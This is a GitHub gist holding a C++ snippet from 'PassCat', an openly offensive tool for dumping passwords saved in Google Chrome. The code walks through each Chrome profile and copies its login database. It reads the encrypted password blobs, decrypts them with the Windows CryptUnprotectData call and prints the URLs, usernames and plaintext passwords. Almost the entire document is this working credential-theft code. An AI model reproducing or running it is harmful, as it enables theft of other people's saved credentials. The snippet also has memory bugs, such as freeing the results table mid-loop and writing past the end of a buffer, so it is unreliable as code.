Skip to content

Instantly share code, notes, and snippets.

@maldevel

maldevel/dumpGoogleChromePasswords.cpp

Created September 12, 2018 14:00
Show Gist options
  • Save maldevel/ee59cc79bf58378354d4eb67cb5aac1b to your computer and use it in GitHub Desktop.
Save maldevel/ee59cc79bf58378354d4eb67cb5aac1b to your computer and use it in GitHub Desktop.
Download ZIP
PassCat Dump Google Chrome passwords snippet
Raw
dumpGoogleChromePasswords.cpp
//https://github.com/twelvesec/passcat
//GNU General Public License v3.0
//@maldevel
//...
static void _print_passwords(std::wstring filename) {
WCHAR tempfile[MAX_PATH] = { 0 };
std::wstring path = libsystem::get_chrome_path();
if (!libsystem::generate_temp_filename(L"psc", tempfile)) {
return;
}
int rc;
char *zErrMsg = 0;
sqlite3 *db;
char **results = NULL;
int rows, columns;
DATA_BLOB DataIn;
DATA_BLOB DataOut;
sqlite3_blob *blob;
void *block = 0;
if (!CopyFileW(filename.c_str(), tempfile, FALSE)) {
return;
}
std::wstring tt(tempfile);
if ((rc = sqlite3_open(std::string(tt.begin(), tt.end()).c_str(), &db))) {
sqlite3_close(db);
return;
}
if ((rc = sqlite3_get_table(db, CHROME_SQL_QUERY, &results, &rows, &columns, &zErrMsg)) != SQLITE_OK) {
sqlite3_free(zErrMsg);
sqlite3_close(db);
return;
}
else {
for (int rowCtr = 1; rowCtr <= rows; ++rowCtr) {
int cellPosition = (rowCtr * columns);
std::cout << "URL: " << results[cellPosition] << std::endl;
cellPosition = (rowCtr * columns) + 1;
std::cout << "Username: " << results[cellPosition] << std::endl;
cellPosition = (rowCtr * columns) + 2;
sqlite3_free_table(results);
if ((rc = sqlite3_blob_open(db, "main", "logins", "password_value", rowCtr, 0, &blob)) != SQLITE_OK) {
sqlite3_close(db);
return;
}
int len = 0;
if ((len = sqlite3_blob_bytes(blob)) <= 0) {
sqlite3_close(db);
return;
}
if ((block = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, len)) == NULL) {
sqlite3_blob_close(blob);
sqlite3_close(db);
return;
}
if ((rc = sqlite3_blob_read(blob, block, len, 0)) != SQLITE_OK) {
HeapFree(GetProcessHeap(), 0, block);
sqlite3_blob_close(blob);
sqlite3_close(db);
return;
}
sqlite3_blob_close(blob);
DataIn.cbData = len;
DataIn.pbData = (BYTE *)block;
if (CryptUnprotectData(&DataIn, NULL, NULL, NULL, NULL, 0, &DataOut)) {
DataOut.pbData[DataOut.cbData] = '\0';
std::cout << "Password: " << DataOut.pbData << std::endl;
}
}
if (rows > 0) {
std::cout << std::endl;
}
}
HeapFree(GetProcessHeap(), 0, block);
sqlite3_close(db);
DeleteFileW(tempfile);
}
void libchrome::print_chrome_passwords(void) {
std::wstring path = libsystem::get_chrome_path();
std::wstring localstate = path + L"\\" + CHROME_CONFIG_FILE;
HANDLE hFind = INVALID_HANDLE_VALUE;
WIN32_FIND_DATAW ffd;
if (!PathFileExistsW(localstate.c_str())) {
return;
}
std::ifstream ifs(localstate);
std::string content((std::istreambuf_iterator<char>(ifs)),
(std::istreambuf_iterator<char>()));
Document d;
d.Parse(content.c_str());
if (d.HasMember("profile") && d["profile"].HasMember("info_cache")) {
if (d["profile"]["info_cache"].IsObject()) {
for (Value::ConstMemberIterator itr = d["profile"]["info_cache"].MemberBegin();
itr != d["profile"]["info_cache"].MemberEnd(); ++itr) {
std::string temp(itr->name.GetString());
std::wstring profilePath = path + L"\\" + std::wstring(temp.begin(), temp.end());
std::wstring searchProfilePath = path + L"\\" + std::wstring(temp.begin(), temp.end()) + L"\\*";
if ((hFind = FindFirstFileW(searchProfilePath.c_str(), &ffd)) == INVALID_HANDLE_VALUE) {
continue;
}
do {
if (ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
continue;
}
else {
std::wstring filename(ffd.cFileName);
std::transform(filename.begin(), filename.end(), filename.begin(), ::tolower);
if (filename.find(CHROME_FILES_SEARCH) != std::wstring::npos) {
_print_passwords(profilePath + L"\\" + ffd.cFileName);
}
}
} while (FindNextFileW(hFind, &ffd) != 0);
FindClose(hFind);
}
}
}
}
//...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment